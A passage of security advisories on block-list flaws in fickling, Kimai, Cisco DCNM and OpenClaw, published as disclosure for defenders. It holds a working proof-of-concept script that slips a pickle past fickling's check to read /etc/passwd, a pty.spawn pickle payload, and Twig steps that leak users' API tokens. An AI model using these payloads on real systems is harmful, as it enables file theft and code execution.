_var0 = getlines('/etc/passwd') # reads the file
from builtins import enumerate
_var1 = enumerate(_var0) # _var0 in RHS - added to used
from builtins import dict
_var2 = dict(_var1) # _var1 in RHS - added to used; produces {0:'line1',...}
from difflib import Differ
_var3 = Differ() # stdlib, not in UNSAFE_IMPORTS
_var4 = _var3
_var4.__setstate__(_var2) # BUILD Expr - _var2 and _var4 added to used
result = _var3 # loop breaks here; nothing in defined−used
check_safety() returns Severity.LIKELY_SAFE. fickling.load() calls pickle.loads(). At runtime, Differ().dict.update({0: 'root:x:0:0\n', ...}) succeeds and the file contents are returned to the caller.
PoC
pip install fickling
#!/usr/bin/env python3
import io
import sys
import fickling.fickle as op
from fickling.fickle import Pickled
from fickling.analysis import check_safety, Severity
from fickling.loader import load
from fickling.exception import UnsafeFileError
TARGET = "/etc/passwd"
pickled = Pickled([
op.Proto.create(4),
op.ShortBinUnicode("linecache"),
op.ShortBinUnicode("getlines"),
op.StackGlobal(),
op.ShortBinUnicode(TARGET),
op.TupleOne(),
op.Reduce(),
op.Memoize(), # memo[0] = _var0 = getlines(TARGET)
op.Global("builtins enumerate"),
op.BinGet(0),
op.TupleOne(),
op.Reduce(),
op.Memoize(), # memo[1] = _var1 = enumerate(_var0)
op.Global("builtins dict"),
op.BinGet(1),
op.TupleOne(),
op.Reduce(),
op.Memoize(), # memo[2] = _var2 = dict(_var1)
op.ShortBinUnicode("difflib"),
op.ShortBinUnicode("Differ"),
op.StackGlobal(),
op.EmptyTuple(),
op.Reduce(),
op.Memoize(), # memo[3] = _var3 = Differ()
op.BinGet(2), # push _var2 as BUILD state
op.Build(), # _var4=_var3; _var4.__setstate__(_var2)
op.BinGet(3),
op.Stop(),
])
result = check_safety(pickled)
assert result.severity == Severity.LIKELY_SAFE, f"Expected LIKELY_SAFE, got {result.severity}"
print(f"[+] check_safety verdict : {result.severity.name} (bypass confirmed)")
buf = io.BytesIO()
pickled.dump(buf)
obj = load(io.BytesIO(buf.getvalue()))
lines = {k: v for k, v in obj.__dict__.items() if isinstance(k, int)}
print(f"[+] fickling.load() returned : {type(obj).__name__}")
print(f"[+] {TARGET} - {len(lines)} lines exfiltrated:\n")
for i in sorted(lines):
print(f"{lines[i]}", end="")
Result
[+] check_safety verdict : LIKELY_SAFE (bypass confirmed)
[+] fickling.load() returned : Differ
[+] /etc/passwd - 58 lines exfiltrated:
root:x:0:0:root:/root:/usr/bin/zsh
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin
dhcpcd:x:100:65534:DHCP Client Daemon,,,:/usr/lib/dhcpcd:/bin/false
systemd-timesync:x:992:992:systemd Time Synchronization:/:/usr/sbin/nologin
Impact
Vulnerability type: Static analysis bypass leading to arbitrary file read (and arbitrary stdlib code execution) through a security-gated deserialization API.
Who is impacted: Any application or service that calls fickling.load() or fickling.loads() to validate untrusted pickle data before deserializing it. This is the primary documented use case of the fickling.loader module. The attacker supplies a pickle file; the server processes it through fickling.load(), receives LIKELY_SAFE, and unpickles the payload. File contents are returned directly in the deserialized object's attributes.
Beyond file read, the same BUILD-opcode technique can be applied to any stdlib module absent from UNSAFE_IMPORTS (e.g., gc.get_objects() for full in-process memory inspection, inspect.stack() for call-frame local variable exfiltration, netrc.netrc() for credential theft).
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 0.1.9"
},
"package": {
"ecosystem": "PyPI",
"name": "fickling"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.1.10"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-184"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-13T20:57:40Z",
"nvd_published_at": null,
"severity": "MODERATE"
},
"details": "# Our analysis\n\nAs stated in the [project\u0027s security policy](https://github.com/trailofbits/fickling/security/policy), we also don\u0027t consider `UnusedVariables` bypasses to be security issues. We added several unsafe modules mentioned by the reporter in advisory comments to the blocklist (https://github.com/trailofbits/fickling/commit/7f39d97258217ee2c21a1f5031d4a6d7343eb30d). \n\n# Original report\n\nTitle: UnusedVariables analysis bypass via BUILD opcode Arbitrary File Read through fickling.load()\n\n### Summary\nTwo independent bugs in fickling\u0027s AST-based static analysis combine to allow a malicious pickle file to execute arbitrary stdlib function calls - including reading sensitive files - while check_safety() returns Severity.LIKELY_SAFE and fickling.load() completes without raising UnsafeFileError.\n\nA server using fickling.load() as a security gate before deserializing untrusted pickle data (its documented use case) is fully bypassed. The attacker receives the contents of any file readable by the server process as the return value of fickling.load().\n\n### Details\nInterpreter.unused_assignments() does not scan the result assignment\u0027s RHS\n\nFile: fickling/fickle.py, Interpreter.unused_assignments(), ~line 1242\n\n```python\nfor statement in self.module_body:\n if isinstance(statement, ast.Assign):\n if (\n len(statement.targets) == 1\n and isinstance(statement.targets[0], ast.Name)\n and statement.targets[0].id == \"result\"\n ):\n break\n ...\n statement = statement.value\n if statement is not None:\n for node in ast.walk(statement):\n if isinstance(node, ast.Name):\n used.add(node.id)\n```\n\nWhen the loop reaches result = _varN, it breaks immediately. The right-hand side of the result assignment is never walked for variable references. Any variable whose only reference is inside the result expression is therefore never added to the used set and is incorrectly flagged as unused - unless it also appears in an earlier non-assignment statement.\n\nThe BUILD opcode generates exactly such a non-assignment statement:\n\n```python\n# Build.run() generates:\n_var4 = _var3 # Assign - _var3 added to used\n_var4.__setstate__(_var2) # Expr - _var2 and _var4 added to used\n```\n\nThis makes _var2 (the result of the dangerous call) appear in the used set via the __setstate__ expression, so UnusedVariables never flags it.\n\nFile: fickling/fickle.py, TupleThree.run(), and siblings\n\n```python\ndef run(self, interpreter: Interpreter):\n top = interpreter.stack.pop()\n mid = interpreter.stack.pop()\n bot = interpreter.stack.pop()\n interpreter.stack.append(ast.Tuple((bot, mid, top), ast.Load()))\n # ^^^^^^^^^^^^^^^^\n # Python tuple, not list\n```\n\nPython\u0027s ast module requires repeated fields (such as Tuple.elts) to be lists. When elts is a Python tuple, ast.iter_child_nodes() does not yield its elements, so ast.walk() never descends into them. Any variable reference stored inside such a tuple node is invisible to every analysis that uses ast.walk() - including UnusedVariables.\n\nDemo:\n\n```python\nimport ast\nname = ast.Name(id=\u0027_var1\u0027, ctx=ast.Load())\n\n# Correct (list elts) - ast.walk finds it\nt = ast.Tuple(elts=[name], ctx=ast.Load())\nprint([n.id for n in ast.walk(t) if isinstance(n, ast.Name)]) # [\u0027_var1\u0027]\n\n# Buggy (tuple elts) - ast.walk finds nothing\nt = ast.Tuple(elts=(name,), ctx=ast.Load())\nprint([n.id for n in ast.walk(t) if isinstance(n, ast.Name)]) # []\n```\n\n#### Combined attack - arbitrary file read\n\nThe two bugs combine with the absence of `linecache` and `difflib` from `UNSAFE_IMPORTS`:\n```\nfrom linecache import getlines # not in UNSAFE_IMPORTS\n_var0 = getlines(\u0027/etc/passwd\u0027) # reads the file\nfrom builtins import enumerate\n_var1 = enumerate(_var0) # _var0 in RHS - added to used\nfrom builtins import dict\n_var2 = dict(_var1) # _var1 in RHS - added to used; produces {0:\u0027line1\u0027,...}\nfrom difflib import Differ\n_var3 = Differ() # stdlib, not in UNSAFE_IMPORTS\n_var4 = _var3\n_var4.__setstate__(_var2) # BUILD Expr - _var2 and _var4 added to used\nresult = _var3 # loop breaks here; nothing in defined\u2212used\n```\n\ncheck_safety() returns Severity.LIKELY_SAFE. fickling.load() calls pickle.loads(). At runtime, Differ().__dict__.update({0: \u0027root:x:0:0\\n\u0027, ...}) succeeds and the file contents are returned to the caller.\n\n### PoC\n`pip install fickling`\n\n```python\n#!/usr/bin/env python3\nimport io\nimport sys\n\nimport fickling.fickle as op\nfrom fickling.fickle import Pickled\nfrom fickling.analysis import check_safety, Severity\nfrom fickling.loader import load\nfrom fickling.exception import UnsafeFileError\n\nTARGET = \"/etc/passwd\"\n\npickled = Pickled([\n op.Proto.create(4),\n\n op.ShortBinUnicode(\"linecache\"),\n op.ShortBinUnicode(\"getlines\"),\n op.StackGlobal(),\n op.ShortBinUnicode(TARGET),\n op.TupleOne(),\n op.Reduce(),\n op.Memoize(), # memo[0] = _var0 = getlines(TARGET)\n\n op.Global(\"builtins enumerate\"),\n op.BinGet(0),\n op.TupleOne(),\n op.Reduce(),\n op.Memoize(), # memo[1] = _var1 = enumerate(_var0)\n\n op.Global(\"builtins dict\"),\n op.BinGet(1),\n op.TupleOne(),\n op.Reduce(),\n op.Memoize(), # memo[2] = _var2 = dict(_var1)\n\n op.ShortBinUnicode(\"difflib\"),\n op.ShortBinUnicode(\"Differ\"),\n op.StackGlobal(),\n op.EmptyTuple(),\n op.Reduce(),\n op.Memoize(), # memo[3] = _var3 = Differ()\n\n op.BinGet(2), # push _var2 as BUILD state\n op.Build(), # _var4=_var3; _var4.__setstate__(_var2)\n\n op.BinGet(3),\n op.Stop(),\n])\n\nresult = check_safety(pickled)\nassert result.severity == Severity.LIKELY_SAFE, f\"Expected LIKELY_SAFE, got {result.severity}\"\nprint(f\"[+] check_safety verdict : {result.severity.name} (bypass confirmed)\")\n\nbuf = io.BytesIO()\npickled.dump(buf)\n\nobj = load(io.BytesIO(buf.getvalue()))\nlines = {k: v for k, v in obj.__dict__.items() if isinstance(k, int)}\n\nprint(f\"[+] fickling.load() returned : {type(obj).__name__}\")\nprint(f\"[+] {TARGET} - {len(lines)} lines exfiltrated:\\n\")\nfor i in sorted(lines):\n print(f\"{lines[i]}\", end=\"\")\n```\n\n### Result\n\n```\n[+] check_safety verdict : LIKELY_SAFE (bypass confirmed)\n[+] fickling.load() returned : Differ\n[+] /etc/passwd - 58 lines exfiltrated:\n\n root:x:0:0:root:/root:/usr/bin/zsh\n daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n bin:x:2:2:bin:/bin:/usr/sbin/nologin\n sys:x:3:3:sys:/dev:/usr/sbin/nologin\n sync:x:4:65534:sync:/bin:/bin/sync\n games:x:5:60:games:/usr/games:/usr/sbin/nologin\n man:x:6:12:man:/var/cache/man:/usr/sbin/nologin\n lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin\n mail:x:8:8:mail:/var/mail:/usr/sbin/nologin\n news:x:9:9:news:/var/spool/news:/usr/sbin/nologin\n uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin\n proxy:x:13:13:proxy:/bin:/usr/sbin/nologin\n www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\n backup:x:34:34:backup:/var/backups:/usr/sbin/nologin\n list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin\n irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin\n _apt:x:42:65534::/nonexistent:/usr/sbin/nologin\n nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\n systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin\n dhcpcd:x:100:65534:DHCP Client Daemon,,,:/usr/lib/dhcpcd:/bin/false\n systemd-timesync:x:992:992:systemd Time Synchronization:/:/usr/sbin/nologin\n\n```\n\n### Impact\nVulnerability type: Static analysis bypass leading to arbitrary file read (and arbitrary stdlib code execution) through a security-gated deserialization API.\n\nWho is impacted: Any application or service that calls fickling.load() or fickling.loads() to validate untrusted pickle data before deserializing it. This is the primary documented use case of the fickling.loader module. The attacker supplies a pickle file; the server processes it through fickling.load(), receives LIKELY_SAFE, and unpickles the payload. File contents are returned directly in the deserialized object\u0027s attributes.\n\nBeyond file read, the same BUILD-opcode technique can be applied to any stdlib module absent from UNSAFE_IMPORTS (e.g., gc.get_objects() for full in-process memory inspection, inspect.stack() for call-frame local variable exfiltration, netrc.netrc() for credential theft).",
"id": "GHSA-r48f-3986-4f9c",
"modified": "2026-03-13T20:57:40Z",
"published": "2026-03-13T20:57:40Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/trailofbits/fickling/security/advisories/GHSA-r48f-3986-4f9c"
},
{
"type": "WEB",
"url": "https://github.com/trailofbits/fickling/commit/7f39d97258217ee2c21a1f5031d4a6d7343eb30d"
},
{
"type": "PACKAGE",
"url": "https://github.com/trailofbits/fickling"
},
{
"type": "WEB",
"url": "https://github.com/trailofbits/fickling/releases/tag/v0.1.10"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:L/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "fickling modules linecache, difflib and gc are missing from the unsafe modules blocklist"
}
GHSA-R64G-5QWV-V2RF
Vulnerability from github – Published: 2022-05-24 17:39 – Updated: 2022-05-24 17:39Multiple vulnerabilities in the REST API endpoint of Cisco Data Center Network Manager (DCNM) could allow an authenticated, remote attacker to view, modify, and delete data without proper authorization. For more information about these vulnerabilities, see the Details section of this advisory.
{
"affected": [],
"aliases": [
"CVE-2021-1133"
],
"database_specific": {
"cwe_ids": [
"CWE-184"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2021-01-20T20:15:00Z",
"severity": "HIGH"
},
"details": "Multiple vulnerabilities in the REST API endpoint of Cisco Data Center Network Manager (DCNM) could allow an authenticated, remote attacker to view, modify, and delete data without proper authorization.\n For more information about these vulnerabilities, see the Details section of this advisory.\n ",
"id": "GHSA-r64g-5qwv-v2rf",
"modified": "2022-05-24T17:39:35Z",
"published": "2022-05-24T17:39:35Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-1133"
},
{
"type": "WEB",
"url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-dcnm-api-path-TpTApx2p"
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-R7V6-MFHQ-G3M2
Vulnerability from github – Published: 2025-12-15 23:37 – Updated: 2026-06-05 17:56Fickling Assessment
Based on the test case provided in the original report below, this bypass was caused by pty missing from our block list of unsafe module imports (as previously documented in #108), rather than the unused variable heuristic. This led to unsafe pickles based on pty.spawn() being incorrectly flagged as LIKELY_SAFE, and was fixed in https://github.com/trailofbits/fickling/pull/187.
Original report
Summary
An unsafe deserialization vulnerability in Fickling allows a crafted pickle file to bypass the "unused variable" heuristic, enabling arbitrary code execution. This bypass is achieved by adding a trivial operation to the pickle file that "uses" the otherwise unused variable left on the stack after a malicious operation, tricking the detection mechanism into classifying the file as safe.
Details
Fickling relies on the heuristic of detecting unused variables in the VM's stack after execution. Opcodes like REDUCE, OBJ, and INST, which can be used for arbitrary code execution, leave a value on the stack that is often unused in malicious pickle files.
This vulnerability enables a bypass by modifying the pickle file to use this leftover variable. A simple way to achieve this is to add a BUILD opcode that, in effect, adds a __setstate__ to the unused variable. This makes Fickling consider the variable "used," thus failing to flag the malicious file.
PoC
The following is a disassembled view of a malicious pickle file that bypasses Fickling's "unused variable" detection:
0: \x80 PROTO 4
2: \x95 FRAME 26
11: \x8c SHORT_BINUNICODE 'pty'
16: \x94 MEMOIZE (as 0)
17: \x8c SHORT_BINUNICODE 'spawn'
24: \x94 MEMOIZE (as 1)
25: \x93 STACK_GLOBAL
26: \x94 MEMOIZE (as 2)
27: \x8c SHORT_BINUNICODE 'id'
31: \x94 MEMOIZE (as 3)
32: \x85 TUPLE1
33: \x94 MEMOIZE (as 4)
34: R REDUCE
35: \x94 MEMOIZE (as 5)
36: \x8c SHORT_BINUNICODE 'gottem'
44: \x94 MEMOIZE (as 6)
45: b BUILD
46: . STOP
```
Here, the additions to the original pickle file can see on lines 35, 36, 44 and 45.
When analyzing this modified file, Fickling fails to identify it as malicious and reports it as **"LIKELY_SAFE"** as seen here:
{ "severity": "LIKELY_SAFE", "analysis": "Warning: Fickling failed to detect any overtly unsafe code,but the pickle file may still be unsafe.Do not unpickle this file if it is from an untrusted source!\n\n", "detailed_results": {} } ```
Impact
This allows an attacker to craft a malicious pickle file that can bypass fickling since it relies on the "unused variable" heuristic to flag pickle files as unsafe. A user who deserializes such a file, believing it to be safe, would inadvertently execute arbitrary code on their system. This impacts any user or system that uses Fickling to vet pickle files for security issues.
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "fickling"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.1.6"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-67748"
],
"database_specific": {
"cwe_ids": [
"CWE-184",
"CWE-502",
"CWE-94"
],
"github_reviewed": true,
"github_reviewed_at": "2025-12-15T23:37:28Z",
"nvd_published_at": "2025-12-16T01:15:52Z",
"severity": "HIGH"
},
"details": "## Fickling Assessment\n\nBased on the test case provided in the original report below, this bypass was caused by `pty` missing from our block list of unsafe module imports (as previously documented in #108), rather than the unused variable heuristic. This led to unsafe pickles based on `pty.spawn()` being incorrectly flagged as `LIKELY_SAFE`, and was fixed in https://github.com/trailofbits/fickling/pull/187. \n\n## Original report\n\n### Summary\nAn unsafe deserialization vulnerability in Fickling allows a crafted pickle file to bypass the \"unused variable\" heuristic, enabling arbitrary code execution. This bypass is achieved by adding a trivial operation to the pickle file that \"uses\" the otherwise unused variable left on the stack after a malicious operation, tricking the detection mechanism into classifying the file as safe.\n\n### Details\nFickling relies on the heuristic of detecting unused variables in the VM\u0027s stack after execution. Opcodes like `REDUCE`, `OBJ`, and `INST`, which can be used for arbitrary code execution, leave a value on the stack that is often unused in malicious pickle files.\nThis vulnerability enables a bypass by modifying the pickle file to use this leftover variable. A simple way to achieve this is to add a `BUILD` opcode that, in effect, adds a `__setstate__` to the unused variable. This makes Fickling consider the variable \"used,\" thus failing to flag the malicious file.\n\n### PoC\nThe following is a disassembled view of a malicious pickle file that bypasses Fickling\u0027s \"unused variable\" detection:\n```\n 0: \\x80 PROTO 4\n 2: \\x95 FRAME 26\n 11: \\x8c SHORT_BINUNICODE \u0027pty\u0027\n 16: \\x94 MEMOIZE (as 0)\n 17: \\x8c SHORT_BINUNICODE \u0027spawn\u0027\n 24: \\x94 MEMOIZE (as 1)\n 25: \\x93 STACK_GLOBAL\n 26: \\x94 MEMOIZE (as 2)\n 27: \\x8c SHORT_BINUNICODE \u0027id\u0027\n 31: \\x94 MEMOIZE (as 3)\n 32: \\x85 TUPLE1\n 33: \\x94 MEMOIZE (as 4)\n 34: R REDUCE\n 35: \\x94 MEMOIZE (as 5)\n 36: \\x8c SHORT_BINUNICODE \u0027gottem\u0027\n 44: \\x94 MEMOIZE (as 6)\n 45: b BUILD\n 46: . STOP\n ```\n \nHere, the additions to the original pickle file can see on lines 35, 36, 44 and 45.\n\nWhen analyzing this modified file, Fickling fails to identify it as malicious and reports it as **\"LIKELY_SAFE\"** as seen here:\n```\n{\n \"severity\": \"LIKELY_SAFE\",\n \"analysis\": \"Warning: Fickling failed to detect any overtly unsafe code,but the pickle file may still be unsafe.Do not unpickle this file if it is from an untrusted source!\\n\\n\",\n \"detailed_results\": {}\n}\n```\n\n### Impact\nThis allows an attacker to craft a malicious pickle file that can bypass fickling since it relies on the \"unused variable\" heuristic to flag pickle files as unsafe. A user who deserializes such a file, believing it to be safe, would inadvertently execute arbitrary code on their system. This impacts any user or system that uses Fickling to vet pickle files for security issues.",
"id": "GHSA-r7v6-mfhq-g3m2",
"modified": "2026-06-05T17:56:00Z",
"published": "2025-12-15T23:37:28Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/trailofbits/fickling/security/advisories/GHSA-r7v6-mfhq-g3m2"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-67748"
},
{
"type": "WEB",
"url": "https://github.com/trailofbits/fickling/pull/108"
},
{
"type": "WEB",
"url": "https://github.com/trailofbits/fickling/pull/187"
},
{
"type": "WEB",
"url": "https://github.com/pypa/advisory-database/tree/main/vulns/fickling/PYSEC-2025-113.yaml"
},
{
"type": "PACKAGE",
"url": "https://github.com/trailofbits/fickling"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P",
"type": "CVSS_V4"
}
],
"summary": "Fickling has Code Injection vulnerability via pty.spawn()"
}
GHSA-RF75-G96H-J3RM
Vulnerability from github – Published: 2026-04-02 21:32 – Updated: 2026-04-06 22:53Duplicate Advisory
This advisory has been withdrawn because it is a duplicate of GHSA-fvx6-pj3r-5q4q. This link is maintained to preserve external references.
Original Description
OpenClaw versions prior to commit 8aceaf5 contain a preflight validation bypass vulnerability in shell-bleed protection that allows attackers to execute blocked script content by using piped or complex command forms that the parser fails to recognize. Attackers can craft commands such as piped execution, command substitution, or subshell invocation to bypass the validateScriptFileForShellBleed() validation checks and execute arbitrary script content that would otherwise be blocked.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "openclaw"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2026.4.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-184"
],
"github_reviewed": true,
"github_reviewed_at": "2026-04-06T22:53:36Z",
"nvd_published_at": "2026-04-02T19:21:31Z",
"severity": "MODERATE"
},
"details": "### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-fvx6-pj3r-5q4q. This link is maintained to preserve external references.\n\n### Original Description\nOpenClaw versions prior to commit 8aceaf5 contain a preflight validation bypass vulnerability in shell-bleed protection that allows attackers to execute blocked script content by using piped or complex command forms that the parser fails to recognize. Attackers can craft commands such as piped execution, command substitution, or subshell invocation to bypass the validateScriptFileForShellBleed() validation checks and execute arbitrary script content that would otherwise be blocked.",
"id": "GHSA-rf75-g96h-j3rm",
"modified": "2026-04-06T22:53:36Z",
"published": "2026-04-02T21:32:52Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-fvx6-pj3r-5q4q"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34425"
},
{
"type": "WEB",
"url": "https://github.com/openclaw/openclaw/commit/8aceaf5d0f0ec552b75a792f7f0a3bfa5b091513"
},
{
"type": "WEB",
"url": "https://www.vulncheck.com/advisories/openclaw-shell-bleed-protection-preflight-validation-bypass"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
],
"summary": "Duplicate Advisory: OpenClaw\u0027s complex interpreter pipelines could skip exec script preflight validation",
"withdrawn": "2026-04-06T22:53:36Z"
}
GHSA-RH42-6RJ2-XWMC
Vulnerability from github – Published: 2026-04-14 01:06 – Updated: 2026-04-14 01:06Summary
The Twig sandbox used for invoice templates blocks certain sensitive User methods (password, TOTP secret, etc.) via a blocklist in StrictPolicy::checkMethodAllowed(). However, getApiToken() and getPlainApiToken() are not on the blocklist. An admin who creates an invoice template can embed calls to these methods, causing the bcrypt or sodium hashed API password of any user who generates an invoice using that template to be included in the rendered output.
Only relevant for OnPremise installations with template upload activated.
Background
Kimai allows admins (ROLE_ADMIN and above) with the manage_invoice_template permission to create Twig-based invoice templates. These templates are rendered in a sandboxed Twig environment with StrictPolicy controlling which methods and properties are accessible.
StrictPolicy explicitly blocks:
// src/Twig/SecurityPolicy/StrictPolicy.php:156
if (\in_array($lcm, [
'getpassword',
'gettotpsecret',
'getplainpassword',
'getconfirmationtoken',
'gettotpauthenticationconfiguration'
], true)) {
throw new SecurityNotAllowedMethodError(...);
}
getApiToken() and getPlainApiToken() are not in this list and are freely callable.
Vulnerable Code
StrictPolicy.php — missing entries in the User method blocklist:
// Current
['getpassword', 'gettotpsecret', 'getplainpassword', 'getconfirmationtoken', 'gettotpauthenticationconfiguration']
// Should also include:
'getapitoken', 'getplainapitoken'
The invoice model passes a User object through model.user, accessible in any twig invoice template.
Steps to Reproduce
- Log in as an admin with the
manage_invoice_templatepermission. - Create a new Twig invoice template (HTML or PDF) containing:
API Token: {{ model.user.getApiToken() }}
Plain Token: {{ model.user.getPlainApiToken() }}
- Save the template and set it as the default for a customer.
- Log in as a regular user assigned to that customer and generate an invoice.
- Observe that the rendered invoice contains the user's API token in plaintext.
Impact
An admin can silently embed token-exfiltration code in a shared invoice template. Every user who subsequently generates an invoice using that template will have their hashed API token leaked into the invoice output.
- API passwords are deprecated since April 2024 and not in wide use anymore (especially by new users)
- The function
getPlainApiToken()does NEVER return any data - The function
getApiToken()might return a bcrypt or sodium hashed API password, if the user (who created the invoice) has configured one - this cannot be used, but needs to be cracked using rainbow tables - The cloud does not allow Twig template upload, this is only relevant for OnPremise installations with template upload activated
Fix
The SecurityPolicy was changed to exclude methods that contains certain trigger words instead of using the hard-coded list, see https://github.com/kimai/kimai/pull/5878
This disables access to both the getApiToken() and getPlainApiToken() function.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 2.52.0"
},
"package": {
"ecosystem": "Packagist",
"name": "kimai/kimai"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.53.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-184"
],
"github_reviewed": true,
"github_reviewed_at": "2026-04-14T01:06:25Z",
"nvd_published_at": null,
"severity": "LOW"
},
"details": "## Summary\n\nThe Twig sandbox used for invoice templates blocks certain sensitive `User` methods (password, TOTP secret, etc.) via a blocklist in `StrictPolicy::checkMethodAllowed()`. However, `getApiToken()` and `getPlainApiToken()` are not on the blocklist. An admin who creates an invoice template can embed calls to these methods, causing the bcrypt or sodium hashed API password of any user who generates an invoice using that template to be included in the rendered output.\n\nOnly relevant for OnPremise installations with template upload activated.\n\n## Background\n\nKimai allows admins (`ROLE_ADMIN` and above) with the `manage_invoice_template` permission to create Twig-based invoice templates. These templates are rendered in a sandboxed Twig environment with `StrictPolicy` controlling which methods and properties are accessible.\n\n`StrictPolicy` explicitly blocks:\n\n```php\n// src/Twig/SecurityPolicy/StrictPolicy.php:156\nif (\\in_array($lcm, [\n \u0027getpassword\u0027,\n \u0027gettotpsecret\u0027,\n \u0027getplainpassword\u0027,\n \u0027getconfirmationtoken\u0027,\n \u0027gettotpauthenticationconfiguration\u0027\n], true)) {\n throw new SecurityNotAllowedMethodError(...);\n}\n```\n\n`getApiToken()` and `getPlainApiToken()` are **not** in this list and are freely callable.\n\n## Vulnerable Code\n\n`StrictPolicy.php` \u2014 missing entries in the User method blocklist:\n\n```php\n// Current\n[\u0027getpassword\u0027, \u0027gettotpsecret\u0027, \u0027getplainpassword\u0027, \u0027getconfirmationtoken\u0027, \u0027gettotpauthenticationconfiguration\u0027]\n\n// Should also include:\n\u0027getapitoken\u0027, \u0027getplainapitoken\u0027\n```\n\nThe invoice model passes a `User` object through `model.user`, accessible in any twig invoice template.\n\n## Steps to Reproduce\n\n1. Log in as an admin with the `manage_invoice_template` permission.\n2. Create a new Twig invoice template (HTML or PDF) containing:\n\n```twig\nAPI Token: {{ model.user.getApiToken() }}\nPlain Token: {{ model.user.getPlainApiToken() }}\n```\n\n3. Save the template and set it as the default for a customer.\n4. Log in as a regular user assigned to that customer and generate an invoice.\n5. Observe that the rendered invoice contains the user\u0027s API token in plaintext.\n\n## Impact\n\nAn admin can silently embed token-exfiltration code in a shared invoice template. Every user who subsequently generates an invoice using that template will have their hashed API token leaked into the invoice output. \n\n- API passwords are [deprecated since April 2024](https://www.kimai.org/en/changelog/2024/cloud-update-104) and not in wide use anymore (especially by new users)\n- The function `getPlainApiToken()` does NEVER return any data\n- The function `getApiToken()` might return a bcrypt or sodium hashed API password, if the user (who created the invoice) has configured one - this cannot be used, but needs to be cracked using rainbow tables\n- The cloud does not allow Twig template upload, this is only relevant for OnPremise installations with template upload activated\n\n## Fix\n\nThe SecurityPolicy was changed to exclude methods that contains certain trigger words instead of using the hard-coded list, see https://github.com/kimai/kimai/pull/5878 \n\nThis disables access to both the `getApiToken()` and `getPlainApiToken()` function.",
"id": "GHSA-rh42-6rj2-xwmc",
"modified": "2026-04-14T01:06:25Z",
"published": "2026-04-14T01:06:25Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/kimai/kimai/security/advisories/GHSA-rh42-6rj2-xwmc"
},
{
"type": "WEB",
"url": "https://github.com/kimai/kimai/pull/5878"
},
{
"type": "PACKAGE",
"url": "https://github.com/kimai/kimai"
}
],
